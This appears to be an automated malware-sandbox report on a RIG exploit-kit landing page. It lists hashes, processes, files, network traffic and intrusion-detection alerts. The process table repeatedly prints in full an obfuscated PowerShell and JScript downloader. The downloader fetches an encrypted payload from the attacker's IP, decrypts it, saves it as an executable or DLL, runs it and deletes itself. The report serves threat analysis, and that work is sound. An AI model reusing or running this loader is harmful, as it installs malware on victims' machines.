URL: | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 |
Full analysis: | https://app.any.run/tasks/d34a617c-c200-46b4-9f1f-5a221a270549 |
Verdict: | Malicious activity |
Analysis date: | November 30, 2020, 01:21:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 26F91CCAD3E88F1AF86E0D15905A559A |
SHA1: | C04D82E1D6075B98B06779771F80FCCCA95BAF15 |
SHA256: | 15C64969551FDD839E5E2C86E9B8D57400EF2E2B4E897D55EC5B32155BDB662C |
SSDEEP: | 6:CwoHHvzS8Kq5M8G0NV7411IbMxSpWut8ghoLjQh7ky7tGfmeDOee16SbuAj3jF0X:UvzIq5hG8mK1pWuroLje7tDE/cJ0X |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2576 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2328 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2912 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2^&cMrEia^&tdZLJXsS=community^&lzEL=one^&njqbfv=community^&PCW=velo^&KIbhGkC=from^&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF^&TcxCAG=train^&vJfq=train^&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL^&yRRn=cars^&Pdd=cars^&ohTu=shuffle^&ZaF=twix^&EEvqGRxtN=twix^&dAmPCMTkwNjMx "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2264 | "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2^&cMrEia^&tdZLJXsS=community^&lzEL=one^&njqbfv=community^&PCW=velo^&KIbhGkC=from^&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF^&TcxCAG=train^&vJfq=train^&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL^&yRRn=cars^&Pdd=cars^&ohTu=shuffle^&ZaF=twix^&EEvqGRxtN=twix^&dAmPCMTkwNjMx 1 | C:\Windows\system32\cmd.exe | — | PowerShell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3308 | wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2&cMrEia&tdZLJXsS=community&lzEL=one&njqbfv=community&PCW=velo&KIbhGkC=from&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF&TcxCAG=train&vJfq=train&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL&yRRn=cars&Pdd=cars&ohTu=shuffle&ZaF=twix&EEvqGRxtN=twix&dAmPCMTkwNjMx 1 | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3028 | "C:\Windows\System32\cmd.exe" /c f1g4z.exe | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2428 | "C:\Windows\system32\ntvdm.exe" | C:\Windows\system32\ntvdm.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
444 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:202131 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
992 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:529801 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
4068 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE2MDE0^&DIMYTCBN^&tOT=why^&gQOmKm=ball^&JvEYjvHy=train^&qlr=cars^&deTjblyai=diet^&aESmmWheC=cars^&EFeLYced=community^&shFSttbz=twix^&shufflet4=-NSaArj3xeDeQdkyIsJUVlBpayv3RXTnRfK0sKC_hKPMgtH_MDEJLA60FzyzIFJMMgk9w^&obyvan4=wn3QMvXcLhXQFYPBJPPcTKZEM1HRH0SD2YubnLG3YpzNZGX_0vHDfF_wrwrcCl6JtcN_L^&Tua=diet^&Yxozw=from^&PLBDlL=ball^&nVMMGKgf=ball^&RdSXpUKODgxNTM= "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2576 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3372 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs668C.tmp | — | |
MD5:— | SHA256:— | |||
3372 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs668D.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\CabB519.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\TarB51A.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verB52B.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\QL7C3T9Q.txt | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\32TU82N5.txt | — | |
MD5:— | SHA256:— | |||
3308 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Low\f1g4z.exe | text | |
MD5:F2E219005E1E3A514609B29F093EE843 | SHA256:C02AADB7A00CC108CD492EF045216D843924FA4650C5ADBDB85247CF5E168EDB | |||
2576 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 | der | |
MD5:17D72CAC63A6AA13767D49E497CEF56D | SHA256:9AF98609603322E425EDC8C739185D02A010309E33646F6664A26A38E31F3015 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3344 | WerFault.exe | GET | — | 104.42.151.234:80 | http://watson.microsoft.com/StageOne/ntvdm_exe/6_1_7600_16385/4a5bc158/StackHash_2264/0_0_0_0/00000000/c0000005/0000ffff.htm?LCID=1033&OS=6.1.7601.2.00010100.1.0.48.17514&SM=DELL&SPN=DELL&BV=DELL&MID=3ADE2C42-4AB9-49B7-B142-BE9AEEA69063 | US | — | — | whitelisted |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
444 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 | DE | html | 69.2 Kb | malicious |
2576 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
2576 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/favicon.ico | DE | — | — | malicious |
2328 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 | DE | html | 68.8 Kb | malicious |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
3308 | wscript.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NTE5MzY2&cMrEia&tdZLJXsS=community&lzEL=one&njqbfv=community&PCW=velo&KIbhGkC=from&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF&TcxCAG=train&vJfq=train&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL&yRRn=cars&Pdd=cars&ohTu=shuffle&ZaF=twix&EEvqGRxtN=twix&dAmPCMTkwNjMx | DE | text | 8 b | malicious |
2548 | wscript.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NTE2MDE0&DIMYTCBN&tOT=why&gQOmKm=ball&JvEYjvHy=train&qlr=cars&deTjblyai=diet&aESmmWheC=cars&EFeLYced=community&shFSttbz=twix&shufflet4=-NSaArj3xeDeQdkyIsJUVlBpayv3RXTnRfK0sKC_hKPMgtH_MDEJLA60FzyzIFJMMgk9w&obyvan4=wn3QMvXcLhXQFYPBJPPcTKZEM1HRH0SD2YubnLG3YpzNZGX_0vHDfF_wrwrcCl6JtcN_L&Tua=diet&Yxozw=from&PLBDlL=ball&nVMMGKgf=ball&RdSXpUKODgxNTM= | DE | text | 8 b | malicious |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2576 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
444 | iexplore.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
3308 | wscript.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
3344 | WerFault.exe | 104.42.151.234:80 | watson.microsoft.com | Microsoft Corporation | US | suspicious |
2328 | iexplore.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
— | — | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
2576 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2576 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
— | — | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2576 | iexplore.exe | 104.18.24.243:80 | ocsp.msocsp.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
api.bing.com |
| whitelisted |
watson.microsoft.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
ocsp.msocsp.com |
| whitelisted |
ieonline.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2328 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
2328 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] RIG-EK Landing Page |
3308 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3344 | WerFault.exe | Potential Corporate Privacy Violation | ET POLICY Application Crash Report Sent to Microsoft |
3344 | WerFault.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
444 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
444 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] RIG-EK Landing Page |
1976 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |